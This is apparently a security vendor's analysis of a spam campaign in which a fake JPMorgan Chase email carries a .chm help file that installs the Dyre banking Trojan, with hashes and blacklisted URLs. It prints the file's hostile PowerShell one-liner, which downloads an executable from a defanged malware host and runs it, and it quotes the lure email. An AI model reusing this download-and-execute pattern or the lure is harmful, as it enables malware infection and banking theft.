A fresh malware sample was recently spotted using an attached Microsoft Compiled HTML (Help file) attached to spam messages. A Microsoft Help file is a binary file, which encompasses a set of HTML files; it usually has a .chm or .hlp extension.
The malicious help file malware analyzed – a .chm file – arrived via spam email posing as coming from JPMorgan Chase & Co., a global financial services firm. The text of the email is as follows:
As your personal manager, I would like to inform you that the terms for your credit agreement terms have been changed according to the new bank policy. Please consult the following Attachment to learn the new terms.
The email also has an attachment named “cannon.zip”. When this attachment is opened, it contains a .chm file named “Message.chm”.
If the .chm is opened, a command prompt opens up momentarily, providing a hint that something is happening in the background.
Viewing the HTML source shows that a PowerShell script was used to download and execute another file:
value=”,cmd,/c powershell (New-Object System.Net.WebClient).DownloadFile(‘hxxp://integrityshavenequinerescuecentre.ca/css/oswald-webfont/test.exe’,’%TEMP%natmasla2.exe’);(New-Object -com Shell.Application).ShellExecute(‘%TEMP%natmasla2.exe’)”>
<PARAM name=”Item2″ value=”273,1,1″>
The script will download a file from a known malware website and will be saved in the TEMP folder as natmasla2.exe. This file will immediately be executed using the ShellExecute command.
The first downloaded file then connects to a PHP resource and receives instructions to download a second file, containing Dyre/Dyreza. As noted recently, Dyre is a banking botnet Trojan with other capabilities.
- chm: 14b166abd7279baa483cfc6e33fc5a3e
- First file (exe): e821100cd69a0902d6ac5b1e56874692
- Second file (php): 72841b43391206f983b0fa2ea0be331a
- .chm is detected by VIPRE as CHM.Generic.a (v)
- First download is detected by VIPRE as Malware!Drop
- Second download is detected by VIPRE as Win32.Generic!BT
VIPRE blacklists both URLs:
- First download: hxxp://integrityshavenequinerescuecentre.ca/css/oswald-webfont/test.exe
- Second download: hxxp://nsgatewayllc.com/news/rss.php
The malicious spam containing this attachment did not originate from JPMorgan Chase or Microsoft. There is no evidence that JPMorgan or Microsoft, or any of their systems have been compromised.
Credit: Dean Lawrence M. Bueno – Malware Researcher
About Author ThreatTrack Security Labs
ThreatTrack Security Labs is the power behind the malware analysis, detection and remediation technologies developed by ThreatTrack Security. From facilities in the United States and the Philippines, our team of cybersecurity professionals, malware researchers, engineers and software developers work around the clock to discover and combat Advanced Persistent Threats, targeted attacks, Zero-days and other sophisticated malware. The company develops advanced cybersecurity solutions that Expose, Analyze and Eliminate the latest malicious threats, including its ThreatSecure advanced threat detection and remediation platform, ThreatAnalyzer malware behavioral analysis sandbox, ThreatIQ real-time threat intelligence service, and VIPRE business antivirus endpoint protection. Learn more about ThreatTrack Security.